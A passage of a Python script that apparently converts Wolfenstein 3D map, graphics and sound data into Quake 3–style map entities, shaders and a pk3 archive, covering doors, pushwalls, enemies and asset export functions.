'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/door__open'), # FIXME: filename
'}',
]
delay_entity = [
'{',
'classname target_delay',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'target "door_{:.0f}_{:.0f}_close"'.format(*tile_coords),
'wait {}'.format((params.door_trigger_wait + params.door_wait) / 2),
'}',
]
speaker_close_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "door_{:.0f}_{:.0f}_close"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/door__close'), # FIXME: filename
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'angle {:.0f}'.format(270 if vertical else 0),
'lip 2',
'dmg 0',
'health 0',
'wait {}'.format(params.door_wait),
'speed {}'.format(params.door_speed),
]
door_end = ['}']
# Door brush
face_shader = '{}_wall/{}__{}'.format(params.short_name, texture_name, int(vertical))
if vertical:
extreme_a = ((center_x - 1), (center_y - half), (center_z - half))
extreme_b = ((center_x + 1), (center_y + half), (center_z + half))
face_shaders = [
'common/caulk',
face_shader,
'common/caulk',
face_shader,
'common/caulk',
'common/caulk',
]
else:
extreme_a = ((center_x - half), (center_y - 1), (center_z - half))
extreme_b = ((center_x + half), (center_y + 1), (center_z + half))
face_shaders = [
face_shader,
'common/caulk',
face_shader,
'common/caulk',
'common/caulk',
'common/caulk',
]
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
door_brush = describe_cuboid_brush(face_vertices, face_shaders, shader_scales, flip_directions=(EAST, WEST))
# Underworld brush
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
return (trigger_begin + trigger_brush + trigger_end +
speaker_open_entity + delay_entity + speaker_close_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_door_hint(self, tile_coords):
cfg = self.cfg
tile = self.tilemap[tile_coords][0]
vertical = cfg.DOOR_MAP[tile][2]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
half = self.params.tile_units / 2
shader_scales = [self.params.shader_scale, self.params.shader_scale]
face_shaders = ['common/skip'] * 6
if vertical:
extreme_a = ((center_x - 0), (center_y - half), (center_z - half))
extreme_b = ((center_x + 1), (center_y + half), (center_z + half))
face_shaders[WEST] = 'common/hint'
else:
extreme_a = ((center_x - half), (center_y - 0), (center_z - half))
extreme_b = ((center_x + half), (center_y + 1), (center_z + half))
face_shaders[NORTH] = 'common/hint'
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
hint_brush = describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return hint_brush
def describe_floor_ceiling_clipping(self, thickness=1):
lines = []
face_shaders = ['common/full_clip'] * 6
shader_scales = (1, 1)
dimensions = self.tilemap.dimensions
tile_units = self.params.tile_units
coords_a = self.center_units((-1, dimensions[1]), self.unit_offsets)
coords_b = self.center_units((dimensions[0], -1), self.unit_offsets)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), -thickness)
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), 0)
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), tile_units)
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (tile_units + thickness))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return lines
def describe_underworld_hollow(self, offset_z=0, thickness=1): # TODO: factorized code for hollows
lines = []
face_shaders = ['common/caulk'] * 6
shader_scales = [self.params.shader_scale, self.params.shader_scale]
dimensions = self.tilemap.dimensions
tile_units = self.params.tile_units
t = thickness
coords_a = self.center_units((-1, dimensions[1]), self.unit_offsets)
coords_b = self.center_units((dimensions[0], -1), self.unit_offsets)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z - 0 - tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z + t - tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z - t + tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z + 0 + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_a[0] + t), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_b[0] - t), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] + t), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] - t), (coords_a[1] + t), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] + t), (coords_b[1] - t), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] - t), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return lines
def describe_worldspawn(self):
params = self.params
cfg = self.cfg
dimensions = self.tilemap.dimensions
tilemap = self.tilemap
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
music_name = cfg.MUSIC_LABELS[cfg.TILEMAP_MUSIC_INDICES[self.tilemap_index]]
lines = [
'{',
'classname worldspawn',
'music "music/{}/{}"'.format(params.short_name, music_name),
'ambient 100',
'_color "1 1 1"',
'message "{}"'.format(tilemap.name),
'author "{}"'.format(params.author),
]
if params.author2:
lines.append('author2 "{}"'.format(params.author2))
for tile_y in range(dimensions[1]):
for tile_x in range(dimensions[0]):
tile_coords = (tile_x, tile_y)
tile, entity, *_ = tilemap[tile_coords]
if tile:
partition = find_partition(tile, cfg.TILE_PARTITION_MAP, count_sign=1,
cache=self.tile_partition_cache)
lines.append('// {} @ {!r} = tile 0x{:04X}'.format(partition, tile_coords, tile))
if (partition in ('floor', 'door', 'door_silver', 'door_gold', 'door_elevator') or
entity == pushwall_entity):
lines.extend(self.describe_area_brushes(tile_coords))
elif partition == 'wall':
lines.extend(self.describe_wall_brush(tile_coords))
else:
raise ValueError((tile_coords, partition))
if tile in cfg.DOOR_MAP:
lines.append('// {} @ {!r} = door 0x{:04X}, hint'.format(partition, tile_coords, tile))
lines += self.describe_door_hint(tile_coords)
if entity:
partition = find_partition(entity, cfg.ENTITY_PARTITION_MAP, count_sign=-1,
cache=self.entity_partition_cache)
if cfg.ENTITY_OBJECT_MAP.get(entity) in cfg.STATIC_OBJECT_NAMES:
lines.append('// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity))
lines += self.describe_sprite(tile_coords)
elif partition == 'enemy':
lines.append('// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity))
lines += self.describe_dead_enemy_sprite(tile_coords)
lines.append('// floor and ceiling clipping planes')
lines += self.describe_floor_ceiling_clipping()
lines.append('// underworld hollow')
lines += self.describe_underworld_hollow(params.underworld_offset)
lines.append('} // worldspawn')
return lines
def compute_progression_field(self, player_start_tile_coords):
cfg = self.cfg
tilemap = self.tilemap
dimensions = tilemap.dimensions
wall_start = cfg.TILE_PARTITION_MAP['wall'][0]
wall_endex = wall_start + cfg.TILE_PARTITION_MAP['wall'][1]
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
field = {(x, y): 0 for y in range(dimensions[1]) for x in range(dimensions[0])}
visited = {(x, y) : False for y in range(dimensions[1]) for x in range(dimensions[0])}
border_tiles = collections.deque([player_start_tile_coords])
while border_tiles:
tile_coords = border_tiles.popleft()
if not visited[tile_coords]:
visited[tile_coords] = True
field_value = field[tile_coords]
x, y = tile_coords
for direction, displacement in enumerate(DIR_TO_DISPL[:4]):
xd, yd, _ = displacement
facing_coords = (x + xd, y + yd)
facing_tile = tilemap.get(facing_coords)
if facing_tile is not None:
object_name = cfg.ENTITY_OBJECT_MAP.get(facing_tile[1])
if (not visited[facing_coords] and object_name not in cfg.SOLID_OBJECT_NAMES and
(not (wall_start <= facing_tile[0] < wall_endex) or facing_tile[1] == pushwall_entity)):
border_tiles.append(facing_coords)
field_value |= (1 << direction)
field[tile_coords] = field_value
return field
def describe_player_start(self, tile_coords):
tile = self.tilemap[tile_coords]
index = tile[1] - self.cfg.ENTITY_PARTITION_MAP['start'][0]
origin = self.center_units(tile_coords, self.unit_offsets)
origin[2] += 32
player_start = [
'{',
'classname info_player_start',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(DIR_TO_YAW[index]),
'}',
]
player_intermission = [
'{',
'classname info_player_intermission',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(DIR_TO_YAW[index]),
'}',
]
return player_start + player_intermission
def describe_turn(self, tile_coords, turn_coords):
tilemap = self.tilemap
index = tilemap[tile_coords][1] - self.cfg.ENTITY_PARTITION_MAP['turn'][0]
origin = self.center_units(tile_coords, self.unit_offsets, center_z=True)
step = TURN_TO_DISPL[index]
target_coords = [(tile_coords[0] + step[0]), (tile_coords[1] + step[1])]
lines = []
found = False
while tilemap.check_coords(target_coords):
for coords in turn_coords:
if coords[0] == target_coords[0] and coords[1] == target_coords[1]:
found = True
break
else:
target_coords[0] += step[0]
target_coords[1] += step[1]
if found:
break
else:
raise ValueError('no target turning point for the one at {!r}'.format(tile_coords))
lines += [
'{',
'classname path_corner',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(TURN_TO_YAW[index]),
'targetname "corner_{:.0f}_{:.0f}"'.format(*tile_coords),
'target "corner_{:.0f}_{:.0f}"'.format(*target_coords),
'}',
]
return lines
def describe_enemy(self, tile_coords, turn_tiles):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
enemy = cfg.ENEMY_MAP.get(tile[1])
if enemy:
direction, level = enemy[1], enemy[3]
if params.enemy_level_min <= level <= params.enemy_level_max and direction < 4:
angle = DIR_TO_YAW[ENEMY_INDEX_TO_DIR[direction]]
origin = self.center_units(tile_coords, self.unit_offsets, center_z=True)
return [
'{',
'classname info_player_deathmatch',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(angle),
'}',
]
return ()
def describe_dead_enemy_sprite(self, tile_coords):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
enemy = cfg.ENEMY_MAP.get(tile[1])
if enemy:
name = enemy[0] + '__dead'
face_shader = '{}_enemy/{}'.format(params.short_name, name)
return self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets)
else:
return ()
def describe_object(self, tile_coords):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
lines = []
name = cfg.ENTITY_OBJECT_MAP.get(tile[1])
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
light = OBJECT_LIGHT_MAP.get(name)
if light:
normalized_height, amount, color = light
origin = (center_x, center_y, (normalized_height * params.tile_units))
lines += [
'{',
'classname light',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'light "{:d}"'.format(amount),
'color "{:f} {:f} {:f}"'.format(*color),
'}',
]
lines.append('// TODO')
return lines
def describe_pushwall(self, tile_coords, progression_field):
params = self.params
cfg = self.cfg
tile = self.tilemap[tile_coords]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
field_value = progression_field[tile_coords]
for direction in range(4):
if field_value & (1 << direction):
move_direction = direction
xd, yd = DIR_TO_DISPL[move_direction][:2]
break
else:
raise ValueError('Pushwall @ {!r} cannot be reached or move'.format(tile_coords))
trigger_begin = [
'{',
'classname trigger_multiple',
'target "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'wait {}'.format(params.pushwall_trigger_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[0] -= xd
unit_offsets[1] += yd
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/pushwall__move'), # FIXME: filename
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'angle {:.0f}'.format(DIR_TO_YAW[move_direction]),
'lip {}'.format(params.tile_units + 2),
'dmg 0',
'health 0',
'wait {}'.format(params.pushwall_wait),
'speed {}'.format(params.pushwall_speed),
# TODO: crusher
]
door_end = ['}']
# Door brush
face_shaders = []
texture = tile[0] - cfg.TILE_PARTITION_MAP['wall'][0]
for direction in range(4):
shader = '{}_wall/{}__{}'.format(params.short_name, cfg.TEXTURE_NAMES[texture], (direction & 1))
face_shaders.append(shader)
face_shaders += ['common/caulk'] * 2
door_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
# Underworld brush
stop_coords = list(tile_coords)
steps = 0
while progression_field[tuple(stop_coords)] & (1 << move_direction) and steps < 3: # FIXME: magic 3
stop_coords[0] += xd
stop_coords[1] += yd
steps += 1
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(stop_coords, face_shaders, unit_offsets)
return (trigger_begin + trigger_brush + trigger_end + speaker_open_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_entities(self): # TODO
cfg = self.cfg
tilemap = self.tilemap
dimensions = tilemap.dimensions
lines = []
turn_list = []
enemy_list = []
pushwall_list = []
player_start_coords = None
for tile_y in range(dimensions[1]):
for tile_x in range(dimensions[0]):
tile_coords = (tile_x, tile_y)
tile, entity, *_ = tilemap[tile_coords]
if entity:
partition = find_partition(entity, cfg.ENTITY_PARTITION_MAP, count_sign=-1,
cache=self.entity_partition_cache)
description = '// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity)
entity_object = cfg.ENTITY_OBJECT_MAP.get(entity)
if partition == 'start':
if player_start_coords is not None:
raise ValueError('There can be only one player start entity')
player_start_coords = tile_coords
lines.append(description)
lines += self.describe_player_start(tile_coords)
elif partition == 'turn':
turn_list.append([description, tile_coords])
elif partition == 'enemy':
enemy_list.append([description, tile_coords])
elif partition == 'pushwall':
pushwall_list.append([description, tile_coords])
elif entity_object in cfg.COLLECTABLE_OBJECT_NAMES:
lines.append(description)
lines += self.describe_collectable(tile_coords)
elif partition == 'object':
lines.append(description)
lines += self.describe_object(tile_coords)
if tile:
partition = find_partition(tile, cfg.TILE_PARTITION_MAP, count_sign=-1,
cache=self.tile_partition_cache)
if tile in cfg.DOOR_MAP:
lines.append('// {} @ {!r} = door 0x{:04X}'.format(partition, tile_coords, tile))
lines += self.describe_door(tile_coords)
progression_field = self.compute_progression_field(player_start_coords)
for description, tile_coords in pushwall_list:
lines.append(description)
lines += self.describe_pushwall(tile_coords, progression_field)
turn_list_entities = [turn[1] for turn in turn_list]
# for description, tile_coords in turn_list:
# lines.append(description)
# lines += self.describe_turn(tile_coords, turn_list_entities)
for description, tile_coords in enemy_list:
lines.append(description)
lines += self.describe_enemy(tile_coords, turn_list_entities)
lines.append('// progression field')
lines += ['// ' + ''.join('{:X}'.format(progression_field[x, y]) for x in range(dimensions[0]))
for y in range(dimensions[1])]
return lines
def describe_tilemap(self):
tilemap = self.tilemap
lines = ['// map #e{}m{}: "{}"'.format(self.episode_index + 1, self.submap_index + 1, tilemap.name)]
lines += self.describe_worldspawn()
lines += self.describe_entities()
return lines
def build_argument_parser():
parser = argparse.ArgumentParser()
group = parser.add_argument_group('input paths')
group.add_argument('--input-folder', default='.')
group.add_argument('--vswap-data', required=True)
group.add_argument('--graphics-data', required=True)
group.add_argument('--graphics-header', required=True)
group.add_argument('--graphics-huffman', required=True)
group.add_argument('--audio-data', required=True)
group.add_argument('--audio-header', required=True)
group.add_argument('--maps-data', required=True)
group.add_argument('--maps-header', required=True)
group.add_argument('--palette') # TODO
group = parser.add_argument_group('output paths')
group.add_argument('--output-folder', default='.')
group.add_argument('--output-pk3', required=True)
group = parser.add_argument_group('settings')
group.add_argument('--cfg', required=True)
group.add_argument('--short-name', default='wolf3d')
group.add_argument('--author', default='(c) id Software')
group.add_argument('--author2')
group.add_argument('--wave-rate', default=22050, type=int)
group.add_argument('--imf-rate', default=700, type=int)
group.add_argument('--imf2wav-path', default=IMF2WAV_PATH)
group.add_argument('--ogg-rate', default=44100, type=int)
group.add_argument('--oggenc2-path', default=OGGENC2_PATH)
group.add_argument('--tile-units', default=96, type=int)
group.add_argument('--alpha-index', default=0xFF, type=int)
group.add_argument('--fix-alpha-halo', action='store_true')
group.add_argument('--texture-scale', default=4, type=int)
group.add_argument('--shader-scale', default=0.375, type=float)
group.add_argument('--door-wait', default=5, type=float)
group.add_argument('--door-speed', default=100, type=float)
group.add_argument('--door-trigger-wait', default=5, type=float)
group.add_argument('--pushwall-wait', default=32767, type=float)
group.add_argument('--pushwall-speed', default=90, type=float)
group.add_argument('--pushwall-trigger-wait', default=32767, type=float)
group.add_argument('--underworld-offset', default=-4096, type=int)
group.add_argument('--enemy-level-min', default=0, type=int)
group.add_argument('--enemy-level-max', default=3, type=int)
return parser
def _sep():
logger = logging.getLogger()
logger.info('-' * 80)
def export_textures(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting textures')
start = 0
count = vswap_chunks_handler.sprites_start - start
texture_manager = pywolf.graphics.TextureManager(vswap_chunks_handler,
cfg.GRAPHICS_PALETTE_MAP[...],
cfg.SPRITE_DIMENSIONS,
start, count)
scaled_size = [side * params.texture_scale for side in cfg.TEXTURE_DIMENSIONS]
for i, texture in enumerate(texture_manager):
name = cfg.TEXTURE_NAMES[i >> 1]
path = 'textures/{}_wall/{}__{}.tga'.format(params.short_name, name, (i & 1))
logger.info('Texture [%d/%d]: %r', (i + 1), count, path)
image = texture.image.transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size).convert('RGB')
pixels_bgr = bytes(x for pixel in image.getdata() for x in reversed(pixel))
texture_stream = io.BytesIO()
write_targa_bgrx(texture_stream, scaled_size, 24, pixels_bgr)
zip_file.writestr(path, texture_stream.getbuffer())
palette = cfg.GRAPHICS_PALETTE
for i, color in enumerate(palette):
path = 'textures/{}_palette/color_0x{:02x}.tga'.format(params.short_name, i)
logger.info('Texture palette color [%d/%d]: %r, (0x%02X, 0x%02X, 0x%02X)',
(i + 1), len(palette), path, *color)
image = build_color_image(cfg.TEXTURE_DIMENSIONS, color)
image = image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in image.getdata() for x in reversed(pixel))
texture_stream = io.BytesIO()
write_targa_bgrx(texture_stream, cfg.TEXTURE_DIMENSIONS, 24, pixels_bgr)
zip_file.writestr(path, texture_stream.getbuffer())
logger.info('Done')
_sep()
def write_texture_shaders(params, cfg, shader_file, palette_shaders=True):
for name in cfg.TEXTURE_NAMES:
for j in range(2):
shader_name = 'textures/{}_wall/{}__{}'.format(params.short_name, name, j)
path = shader_name + '.tga'
shader_file.write(TEXTURE_SHADER_TEMPLATE.format(shader_name, path))
if palette_shaders:
palette = cfg.GRAPHICS_PALETTE
for i in range(len(palette)):
shader_name = 'textures/{}_palette/color_0x{:02x}'.format(params.short_name, i)
path = shader_name + '.tga'
shader_file.write(TEXTURE_SHADER_TEMPLATE.format(shader_name, path))
def write_static_shaders(params, cfg, shader_file):
for name in cfg.STATIC_OBJECT_NAMES:
shader_name = 'textures/{}_static/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def write_collectable_shaders(params, cfg, shader_file):
for name in cfg.COLLECTABLE_OBJECT_NAMES:
shader_name = 'textures/{}_collectable/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def write_enemy_shaders(params, cfg, shader_file):
ignored_names = cfg.STATIC_OBJECT_NAMES + cfg.COLLECTABLE_OBJECT_NAMES
names = [name for name in cfg.SPRITE_NAMES if name not in ignored_names or name.endswith('__dead')]
for name in names:
shader_name = 'textures/{}_enemy/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def export_shader(params, cfg, zip_file, script_name, shader_writer):
shader_text_stream = io.StringIO()
shader_writer(params, cfg, shader_text_stream)
shader_text = shader_text_stream.getvalue()
zip_file.writestr('scripts/{}'.format(script_name), shader_text.encode())
folder = os.path.join(params.output_folder, 'scripts')
os.makedirs(folder, exist_ok=True)
with open(os.path.join(folder, script_name), 'wt') as shader_file:
shader_file.write(shader_text)
def export_shaders(params, cfg, zip_file):
logger = logging.getLogger()
logger.info('Exporting shaders')
script_writer_map = {
'{}_wall.shader'.format(params.short_name): write_texture_shaders,
'{}_static.shader'.format(params.short_name): write_static_shaders,
'{}_collectable.shader'.format(params.short_name): write_collectable_shaders,
'{}_enemy.shader'.format(params.short_name): write_enemy_shaders,
}
for script_name, shader_writer in script_writer_map.items():
export_shader(params, cfg, zip_file, script_name, shader_writer)
logger.info('Done')
_sep()
def image_to_array(image, shape, dtype=np.uint8):
return np.array(image.getdata(), dtype).reshape(shape)
def array_to_rgbx(arr, size, channels):
assert 3 <= channels <= 4
mode = 'RGBA' if channels == 4 else 'RGB'
arr = arr.reshape(arr.shape[0] * arr.shape[1], arr.shape[2]).astype(np.uint8)
if channels == 4 and len(arr[0]) == 3: # FIXME: make generic, this is only for RGB->RGBA
arr = np.c_[arr, 255 * np.ones((len(arr), 1), np.uint8)]
return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)
def fix_sprite_halo(rgba_image, alpha_layer):
alpha_layer = image_to_array(alpha_layer, rgba_image.size)
mask_cells = (alpha_layer != 0)
mask = mask_cells.astype(np.uint8)
source = image_to_array(rgba_image, rgba_image.size + (4,))
source *= mask[..., None].repeat(4, axis=2)
accum = np.zeros_like(source, np.uint16)
accum[ :-1, : ] += source[1: , : ]
accum[1: , : ] += source[ :-1, : ]
accum[ : , :-1] += source[ : , 1: ]
accum[ : , 1: ] += source[ : , :-1]
accum[ :-1, :-1] += source[1: , 1: ]
accum[ :-1, 1: ] += source[1: , :-1]
accum[1: , :-1] += source[ :-1, 1: ]
accum[1: , 1: ] += source[ :-1, :-1]
count = np.zeros_like(mask)
count[ :-1, : ] += mask[1: , : ]
count[1: , : ] += mask[ :-1, : ]
count[ : , :-1] += mask[ : , 1: ]
count[ : , 1: ] += mask[ : , :-1]
count[ :-1, :-1] += mask[1: , 1: ]
count[ :-1, 1: ] += mask[1: , :-1]
count[1: , :-1] += mask[ :-1, 1: ]
count[1: , 1: ] += mask[ :-1, :-1]
count_div = np.maximum(np.ones_like(count), count)
count_div = count_div[..., None].repeat(4, axis=2)
accum = (accum // count_div).astype(np.uint8)
accum[..., 3] = 0
accum[mask_cells] = source[mask_cells]
result = array_to_rgbx(accum, rgba_image.size, 4)
return result
def export_sprites(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting sprites')
start = vswap_chunks_handler.sprites_start
count = vswap_chunks_handler.sounds_start - start
sprite_manager = pywolf.graphics.SpriteManager(vswap_chunks_handler,
cfg.GRAPHICS_PALETTE_MAP[...],
cfg.SPRITE_DIMENSIONS,
start, count, params.alpha_index)
scaled_size = [side * params.texture_scale for side in cfg.SPRITE_DIMENSIONS]
for i, sprite in enumerate(sprite_manager):
name = cfg.SPRITE_NAMES[i]
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
logger.info('Sprite [%d/%d]: %r', (i + 1), count, path)
image = sprite.image.convert('RGBA')
if params.fix_alpha_halo:
alpha_layer = image.split()[-1].transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size)
image = image.transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size)
if params.fix_alpha_halo:
image = fix_sprite_halo(image, alpha_layer)
pixels_bgra = bytes(x for pixel in image.getdata()
for x in [pixel[2], pixel[1], pixel[0], pixel[3]])
sprite_stream = io.BytesIO()
write_targa_bgrx(sprite_stream, scaled_size, 32, pixels_bgra)
zip_file.writestr(path, sprite_stream.getbuffer())
logger.info('Done')
_sep()
def export_pictures(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting pictures')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
palette_map = cfg.GRAPHICS_PALETTE_MAP
start, count = partitions_map['pics']
picture_manager = pywolf.graphics.PictureManager(graphics_chunks_handler, palette_map, start, count)
for i, picture in enumerate(picture_manager):
path = 'gfx/{}/{}.tga'.format(params.short_name, cfg.PICTURE_NAMES[i])
logger.info('Picture [%d/%d]: %r', (i + 1), count, path)
top_bottom_rgb_image = picture.image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in top_bottom_rgb_image.getdata() for x in reversed(pixel))
picture_stream = io.BytesIO()
write_targa_bgrx(picture_stream, picture.dimensions, 24, pixels_bgr)
zip_file.writestr(path, picture_stream.getbuffer())
logger.info('Done')
_sep()
def export_tile8(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting tile8')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
palette_map = cfg.GRAPHICS_PALETTE_MAP
start, count = partitions_map['tile8']
tile8_manager = pywolf.graphics.Tile8Manager(graphics_chunks_handler, palette_map, start, count)
for i, tile8 in enumerate(tile8_manager):
path = 'gfx/{}/tile8__{}.tga'.format(params.short_name, cfg.TILE8_NAMES[i])
logger.info('Tile8 [%d/%d]: %r', (i + 1), count, path)
top_bottom_rgb_image = tile8.image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in top_bottom_rgb_image.getdata() for x in reversed(pixel))
tile8_stream = io.BytesIO()
write_targa_bgrx(tile8_stream, tile8.dimensions, 24, pixels_bgr)
zip_file.writestr(path, tile8_stream.getbuffer())
logger.info('Done')
_sep()
def export_screens(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting DOS screens')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['screens']
screen_manager = pywolf.graphics.DOSScreenManager(graphics_chunks_handler, start, count)
for i, screen in enumerate(screen_manager):
path = 'texts/{}/screens/{}.scr'.format(params.short_name, cfg.SCREEN_NAMES[i])
logger.info('DOS Screen [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, screen.data)
logger.info('Done')
_sep()
def export_helparts(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting HelpArt texts')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['helpart']
helpart_manager = pywolf.graphics.TextArtManager(graphics_chunks_handler, start, count)
for i, helpart in enumerate(helpart_manager):
path = 'texts/{}/helpart/helpart_{}.txt'.format(params.short_name, i)
logger.info('HelpArt [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, helpart.encode('ascii'))
logger.info('Done')
_sep()
def export_endarts(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting EndArt texts')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['endart']
endart_manager = pywolf.graphics.TextArtManager(graphics_chunks_handler, start, count)
for i, endart in enumerate(endart_manager):
path = 'texts/{}/endart/endart_{}.txt'.format(params.short_name, i)
logger.info('EndArt [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, endart.encode('ascii'))
logger.info('Done')
_sep()
def export_sampled_sounds(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting sampled sounds')
start = vswap_chunks_handler.sounds_start
count = len(vswap_chunks_handler.sounds_infos)
sample_manager = pywolf.audio.SampledSoundManager(vswap_chunks_handler,
cfg.SAMPLED_SOUND_FREQUENCY,
start, count)
scale_factor = params.wave_rate / cfg.SAMPLED_SOUND_FREQUENCY
for i, sound in enumerate(sample_manager):
name = cfg.SAMPLED_SOUND_NAMES[i]
path = 'sound/{}/sampled/{}.wav'.format(params.short_name, name)
logger.info('Sampled sound [%d/%d]: %r', (i + 1), count, path)
samples = bytes(samples_upsample(sound.samples, scale_factor))
wave_file = io.BytesIO()
